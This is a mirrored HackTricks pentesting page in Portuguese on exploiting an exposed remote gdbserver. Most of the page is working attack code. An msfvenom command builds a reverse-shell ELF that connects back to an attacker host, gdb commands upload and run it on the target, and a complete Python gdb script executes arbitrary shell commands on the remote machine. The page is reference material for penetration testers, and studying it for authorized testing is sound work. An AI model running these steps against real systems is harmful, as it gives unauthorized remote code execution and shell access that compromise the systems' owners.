mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	
		
			
				
	
	
		
			178 lines
		
	
	
		
			4.8 KiB
		
	
	
	
		
			Markdown
		
	
	
	
	
	
			
		
		
	
	
			178 lines
		
	
	
		
			4.8 KiB
		
	
	
	
		
			Markdown
		
	
	
	
	
	
| # Pentesting Remote GdbServer
 | |
| 
 | |
| {{#include ../banners/hacktricks-training.md}}
 | |
| 
 | |
| 
 | |
| ## **Informações Básicas**
 | |
| 
 | |
| **gdbserver** é uma ferramenta que permite a depuração de programas remotamente. Ele é executado ao lado do programa que precisa ser depurado no mesmo sistema, conhecido como "alvo". Essa configuração permite que o **GNU Debugger** se conecte de uma máquina diferente, o "host", onde o código-fonte e uma cópia binária do programa depurado estão armazenados. A conexão entre **gdbserver** e o depurador pode ser feita via TCP ou uma linha serial, permitindo configurações de depuração versáteis.
 | |
| 
 | |
| Você pode fazer um **gdbserver escutar em qualquer porta** e, no momento, **nmap não é capaz de reconhecer o serviço**.
 | |
| 
 | |
| ## Exploração
 | |
| 
 | |
| ### Carregar e Executar
 | |
| 
 | |
| Você pode facilmente criar um **elf backdoor com msfvenom**, carregá-lo e executá-lo:
 | |
| ```bash
 | |
| # Trick shared by @B1n4rySh4d0w
 | |
| msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 PrependFork=true -f elf -o binary.elf
 | |
| 
 | |
| chmod +x binary.elf
 | |
| 
 | |
| gdb binary.elf
 | |
| 
 | |
| # Set remote debuger target
 | |
| target extended-remote 10.10.10.11:1337
 | |
| 
 | |
| # Upload elf file
 | |
| remote put binary.elf binary.elf
 | |
| 
 | |
| # Set remote executable file
 | |
| set remote exec-file /home/user/binary.elf
 | |
| 
 | |
| # Execute reverse shell executable
 | |
| run
 | |
| 
 | |
| # You should get your reverse-shell
 | |
| ```
 | |
| ### Executar comandos arbitrários
 | |
| 
 | |
| Há outra maneira de **fazer o depurador executar comandos arbitrários via um** [**script Python personalizado retirado daqui**](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target).
 | |
| ```bash
 | |
| # Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
 | |
| target extended-remote 192.168.1.4:2345
 | |
| 
 | |
| # Load our custom gdb command `rcmd`.
 | |
| source ./remote-cmd.py
 | |
| 
 | |
| # Change to a trusty binary and run it to load it
 | |
| set remote exec-file /bin/bash
 | |
| r
 | |
| 
 | |
| # Run until a point where libc has been loaded on the remote process, e.g. start of main().
 | |
| tb main
 | |
| r
 | |
| 
 | |
| # Run the remote command, e.g. `ls`.
 | |
| rcmd ls
 | |
| ```
 | |
| Primeiro de tudo, **crie localmente este script**:
 | |
| ```python:remote-cmd.py
 | |
| #!/usr/bin/env python3
 | |
| 
 | |
| import gdb
 | |
| import re
 | |
| import traceback
 | |
| import uuid
 | |
| 
 | |
| 
 | |
| class RemoteCmd(gdb.Command):
 | |
| def __init__(self):
 | |
| self.addresses = {}
 | |
| 
 | |
| self.tmp_file = f'/tmp/{uuid.uuid4().hex}'
 | |
| gdb.write(f"Using tmp output file: {self.tmp_file}.\n")
 | |
| 
 | |
| gdb.execute("set detach-on-fork off")
 | |
| gdb.execute("set follow-fork-mode parent")
 | |
| 
 | |
| gdb.execute("set max-value-size unlimited")
 | |
| gdb.execute("set pagination off")
 | |
| gdb.execute("set print elements 0")
 | |
| gdb.execute("set print repeats 0")
 | |
| 
 | |
| super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER)
 | |
| 
 | |
| def preload(self):
 | |
| for symbol in [
 | |
| "close",
 | |
| "execl",
 | |
| "fork",
 | |
| "free",
 | |
| "lseek",
 | |
| "malloc",
 | |
| "open",
 | |
| "read",
 | |
| ]:
 | |
| self.load(symbol)
 | |
| 
 | |
| def load(self, symbol):
 | |
| if symbol not in self.addresses:
 | |
| address_string = gdb.execute(f"info address {symbol}", to_string=True)
 | |
| match = re.match(
 | |
| f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE
 | |
| )
 | |
| if match and len(match.groups()) > 0:
 | |
| self.addresses[symbol] = match.groups()[0]
 | |
| else:
 | |
| raise RuntimeError(f'Could not retrieve address for symbol "{symbol}".')
 | |
| 
 | |
| return self.addresses[symbol]
 | |
| 
 | |
| def output(self):
 | |
| # From `fcntl-linux.h`
 | |
| O_RDONLY = 0
 | |
| gdb.execute(
 | |
| f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})'
 | |
| )
 | |
| 
 | |
| # From `stdio.h`
 | |
| SEEK_SET = 0
 | |
| SEEK_END = 2
 | |
| gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})')
 | |
| gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})')
 | |
| if int(gdb.convenience_variable("len")) <= 0:
 | |
| gdb.write("No output was captured.")
 | |
| return
 | |
| 
 | |
| gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)')
 | |
| gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)')
 | |
| gdb.execute('printf "%s\\n", (char*) $mem')
 | |
| 
 | |
| gdb.execute(f'call (int){self.load("close")}($fd)')
 | |
| gdb.execute(f'call (int){self.load("free")}($mem)')
 | |
| 
 | |
| def invoke(self, arg, from_tty):
 | |
| try:
 | |
| self.preload()
 | |
| 
 | |
| is_auto_solib_add = gdb.parameter("auto-solib-add")
 | |
| gdb.execute("set auto-solib-add off")
 | |
| 
 | |
| parent_inferior = gdb.selected_inferior()
 | |
| gdb.execute(f'set $child_pid = (int){self.load("fork")}()')
 | |
| child_pid = gdb.convenience_variable("child_pid")
 | |
| child_inferior = list(
 | |
| filter(lambda x: x.pid == child_pid, gdb.inferiors())
 | |
| )[0]
 | |
| gdb.execute(f"inferior {child_inferior.num}")
 | |
| 
 | |
| try:
 | |
| gdb.execute(
 | |
| f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)'
 | |
| )
 | |
| except gdb.error as e:
 | |
| if (
 | |
| "The program being debugged exited while in a function called from GDB"
 | |
| in str(e)
 | |
| ):
 | |
| pass
 | |
| else:
 | |
| raise e
 | |
| finally:
 | |
| gdb.execute(f"inferior {parent_inferior.num}")
 | |
| gdb.execute(f"remove-inferiors {child_inferior.num}")
 | |
| 
 | |
| self.output()
 | |
| except Exception as e:
 | |
| gdb.write("".join(traceback.TracebackException.from_exception(e).format()))
 | |
| raise e
 | |
| finally:
 | |
| gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}')
 | |
| 
 | |
| 
 | |
| RemoteCmd()
 | |
| ```
 | |
| {{#include ../banners/hacktricks-training.md}}
 |